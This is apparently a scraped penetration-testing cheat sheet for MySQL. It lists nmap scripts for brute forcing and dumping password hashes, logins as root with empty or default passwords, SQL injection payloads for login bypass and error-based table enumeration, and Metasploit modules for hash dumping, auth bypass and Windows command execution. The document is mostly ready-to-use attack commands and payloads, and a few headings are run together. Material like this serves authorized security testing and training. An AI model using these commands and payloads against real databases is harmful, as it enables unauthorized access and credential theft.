3306 - Pentesting mysql
Scan
nmap
namp nmapnmap -p 3306 --script=mysql-enum $IP
nmap -p 3306 --script=mysql-audit $IP
nmap -p 3306 --script=mysql-brute $IP
nmap -p 3306 --script=mysql-databases $IP
nmap -p 3306 --script=mysql-dump-hashes $IP
nmap -p 3306 --script=mysql-empty-password $IP
nmap -p 3306 --script=mysql-info $IP
nmap -p 3306 --script=mysql-query $IP
nmap -p 3306 --script=mysql-users $IP
nmap -p 3306 --script=mysql-variables $IP
nmap -p 3306 --script=mysql-vuln-cve2012-2122 $IP
Connect
install mysql client
localmysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
mysql --user=root --password=password
Bruteforce
medusa
hydraSQL Injection
x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
SELECT null,GROUP_CONCAT(DISTINCT CONCAT(table_name)),null FROM information_schema.tables WHERE table_schema = 'sqli_one'
SELECT null, extractvalue(1, concat('=', (SELECT GROUP_CONCAT(DISTINCT CONCAT(table_name)) FROM information_schema.tables WHERE table_schema = 'sqli_one'))),null
function
Name | Description |
---|---|
BENCHMARK() | Repeatedly execute an expression |
CHARSET() | Return the character set of the argument |
COERCIBILITY() | Return the collation coercibility value of the string argument |
COLLATION() | Return the collation of the string argument |
CONNECTION_ID() | Return the connection ID (thread ID) for the connection |
CURRENT_USER() | , CURRENT_USER The authenticated user name and host name |
DATABASE() | Return the default (current) database name |
FOUND_ROWS() | For a SELECT with a LIMIT clause, the number of rows that would be returned were there no LIMIT clause |
LAST_INSERT_ID() | Value of the AUTOINCREMENT column for the last INSERT |
ROW_COUNT() | The number of rows updated |
SCHEMA() | Synonym for DATABASE() |
SESSION_USER() | Synonym for USER() |
SYSTEM_USER() | Synonym for USER() |
USER() | The user name and host name provided by the client |
VERSION() | Return a string that indicates the MySQL server version |
Enumerate
Metasploit
- msf> use auxiliary/admin/mysql/mysql_sql
- msf> use auxiliary/scanner/mysql/mysql_version
- msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
- msf> use auxiliary/scanner/mysql/mysql_hashdump -> Creds
- msf> use auxiliary/admin/mysql/mysql_enum -> Creds
- msf> use auxiliary/scanner/mysql/mysql_schemadump -> Creds
- msf> use exploit/windows/mysql/mysql_start_up -> Execute commands Windows, Creds